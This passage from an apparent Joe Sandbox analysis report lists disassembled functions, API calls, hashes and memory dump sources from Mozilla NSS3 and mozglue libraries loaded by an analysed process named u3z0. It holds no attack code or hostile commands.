                                                                                                                                                                                                                                                                                        • Instruction ID: 2ab68d63e48f5061c37e3a417af2617b9717e0447643dc581f280bf1ee12813c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78622b3db11fd2e590c4f6dbe3d7886469a52bc88116157166ffbad72ccbbbc9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D216B71A05104DFDB20DB6CDE88BAA33B4BB4270EF150835E40A97761DB30DA08C7A2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C878CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,?,6C88124D,00000001), ref: 6C878D19
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C88124D,00000001), ref: 6C878D32
                                                                                                                                                                                                                                                                                        • PL_ArenaRelease.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878D73
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878D8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C88124D,00000001), ref: 6C878DBA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                                        • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                                        • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                        • Opcode ID: f52016b077cd044aac0697128ddf1e48d13e1d9fdaa2965d2feb4f2234dde0f9
                                                                                                                                                                                                                                                                                        • Instruction ID: 405ec2b6d7bd79be22637342a58ea89f180f93258fcec2da965fcefbad9547ab
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f52016b077cd044aac0697128ddf1e48d13e1d9fdaa2965d2feb4f2234dde0f9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 062181B5A046058FCB20EF38C68456EBBF0FF55319F158D6AD89897701E734E881CBA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C789420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: EnterCriticalSection.KERNEL32(6C7CE370,?,?,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284), ref: 6C77AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB89: LeaveCriticalSection.KERNEL32(6C7CE370,?,6C7434DE,6C7CF6CC,?,?,?,?,?,?,?,6C743284,?,?,6C7656F6), ref: 6C77ABD1
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C78945E
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789470
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C77F710,?,00000039,00000000,?,6C79138F,?,?,?), ref: 6C789482
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C78949F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C78946B
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C789459
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C78947D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                        • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                        • Opcode ID: 86396fdc54bb39713ba1a7ad96c78a3431a9e988a6854bdb26c1dfdefe36b7fa
                                                                                                                                                                                                                                                                                        • Instruction ID: 4da71c6ef3f07078c10d09b33c0c791cb7ac63c59596acb3bf38808741fb11b0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86396fdc54bb39713ba1a7ad96c78a3431a9e988a6854bdb26c1dfdefe36b7fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B01FC70B011038FDB109B6DDF15A4633B5EB05329F040537EE2E86B51D635E7A48957
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8A0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?,?,00000000,?,?), ref: 6C8A0CB3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?), ref: 6C8A0DC1
                                                                                                                                                                                                                                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?), ref: 6C8A0DEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C862AF5,?,?,?,?,?,6C860A1B,00000000), ref: 6C8C0F1A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0F10: malloc.MOZGLUE(00000001), ref: 6C8C0F30
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C8C0F42
                                                                                                                                                                                                                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0DFF
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000), ref: 6C8A0E16
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0E53
                                                                                                                                                                                                                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?,?,6C8A1444,?,?,00000000), ref: 6C8A0E65
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C8A1444,?,00000001,?,00000000,00000000,?), ref: 6C8A0E79
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B1560: TlsGetValue.KERNEL32(00000000,?,6C880844,?), ref: 6C8B157A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B1560: EnterCriticalSection.KERNEL32(?,?,?,6C880844,?), ref: 6C8B158F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8B1560: PR_Unlock.NSS3(?,?,?,?,6C880844,?), ref: 6C8B15B2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C87B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C881397,00000000,?,6C87CF93,5B5F5EC0,00000000,?,6C881397,?), ref: 6C87B1CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C87B1A0: free.MOZGLUE(5B5F5EC0,?,6C87CF93,5B5F5EC0,00000000,?,6C881397,?), ref: 6C87B1D2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8788AE,-00000008), ref: 6C878A04
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: EnterCriticalSection.KERNEL32(?), ref: 6C878A15
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: memset.VCRUNTIME140(6C8788AE,00000000,00000132), ref: 6C878A27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8789E0: PR_Unlock.NSS3(?), ref: 6C878A35
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 002d15971d66ab871fd29d83327006321c3d975061aaca2d2c0453158e6f9120
                                                                                                                                                                                                                                                                                        • Instruction ID: 583e6d55f89ec61eea536dfe2b314b64765913900395a5c7a075e0538b27fcb6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 002d15971d66ab871fd29d83327006321c3d975061aaca2d2c0453158e6f9120
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8351C9B6E012005FEB209F68DE41AAF37A8DF15258F150934EC169BB12FB31ED1587A2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7BB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C7BB5B9
                                                                                                                                                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C7BB5C5
                                                                                                                                                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C7BB5DA
                                                                                                                                                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C7BB5F4
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C7BB605
                                                                                                                                                                                                                                                                                        • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C7BB61F
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C7BB631
                                                                                                                                                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7BB655
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1276798925-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a08fcb5dfe3e72f5d2a6bdaad2f82ce2ff6a20f429fe0b83ddea37058b099a84
                                                                                                                                                                                                                                                                                        • Instruction ID: c228417591913962893bcc32d92511cbfcb92463d6c1792afb3736eacbfce16f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a08fcb5dfe3e72f5d2a6bdaad2f82ce2ff6a20f429fe0b83ddea37058b099a84
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7318471B001068FCF10DF69C9999AEB7B5FF89325B140579E906A7740DB30BA4ACB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C786590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C786727
                                                                                                                                                                                                                                                                                        • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7867C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C794290: memcpy.VCRUNTIME140(?,?,?,:yl,?,:yl,00000001,?,6C793AED,?,00000001), ref: 6C7942C4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                        • String ID: data$v|l
                                                                                                                                                                                                                                                                                        • API String ID: 511789754-2500571834
                                                                                                                                                                                                                                                                                        • Opcode ID: e4d12df64f6803d95008b62d8772775681c3bca302b0974806422d06eb233564
                                                                                                                                                                                                                                                                                        • Instruction ID: 7b40f26f2ae723f0ba0bc4f2b9e69141e1dc778d922fb2dd8a53f4ee6adcb074
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4d12df64f6803d95008b62d8772775681c3bca302b0974806422d06eb233564
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9D1E074A053409FD724CF25CA48B9EB7E5BFD5308F10893DE18997B91DB30A909CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C77D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C74EB57,?,?,?,?,?,?,?,?,?), ref: 6C77D652
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C74EB57,?), ref: 6C77D660
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C74EB57,?), ref: 6C77D673
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C77D888
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: Wtl$|Enabled
                                                                                                                                                                                                                                                                                        • API String ID: 4142949111-1387902572
                                                                                                                                                                                                                                                                                        • Opcode ID: d58a3a0052b0673a13e4dd091e5c6ae5bd10771df5f6911b638479620f3ec45d
                                                                                                                                                                                                                                                                                        • Instruction ID: 2746eb1460a0ca15d7db5335b8af1b531c944f9a8335870f60b6eb5fa11de443
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d58a3a0052b0673a13e4dd091e5c6ae5bd10771df5f6911b638479620f3ec45d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CA115B0A003098FDF20CF69C5847AEBBF1AF59318F14806CD899AB741D735A945CBB5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8AAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C8AAB3E,?,?,?), ref: 6C8AAC35
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C88CF16
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C8AAB3E,?,?,?), ref: 6C8AAC55
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C
                                                                                                                                                                                                                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C8AAB3E,?,?), ref: 6C8AAC70
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: TlsGetValue.KERNEL32 ref: 6C88E33C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: EnterCriticalSection.KERNEL32(?), ref: 6C88E350
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: PR_Unlock.NSS3(?), ref: 6C88E5BC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C88E5CA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: TlsGetValue.KERNEL32 ref: 6C88E5F2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: EnterCriticalSection.KERNEL32(?), ref: 6C88E606
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88E300: PORT_Alloc_Util.NSS3(?), ref: 6C88E613
                                                                                                                                                                                                                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C8AAC92
                                                                                                                                                                                                                                                                                        • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8AAB3E), ref: 6C8AACD7
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C8AAD10
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C8AAD2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88F360: TlsGetValue.KERNEL32(00000000,?,6C8AA904,?), ref: 6C88F38B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88F360: EnterCriticalSection.KERNEL32(?,?,?,6C8AA904,?), ref: 6C88F3A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C88F360: PR_Unlock.NSS3(?,?,?,?,6C8AA904,?), ref: 6C88F3D3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2c7677033ee0f7f4df585d04b01e58a94b9856d59b918d6b82d7965ccb14ddad
                                                                                                                                                                                                                                                                                        • Instruction ID: b1f5ee83ec9644b85ff5f1022a78a7a04ccecede83903416ab67806fc0bac6db
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c7677033ee0f7f4df585d04b01e58a94b9856d59b918d6b82d7965ccb14ddad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE3129B1E002056FEB208FA9CD409EF7776EF84718B198938E91557F40EB31DC068BA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C791D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C791D0F
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,6C791BE3,?,?,6C791D96,00000000), ref: 6C791D18
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,6C791BE3,?,?,6C791D96,00000000), ref: 6C791D4C
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C791DB7
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C791DC0
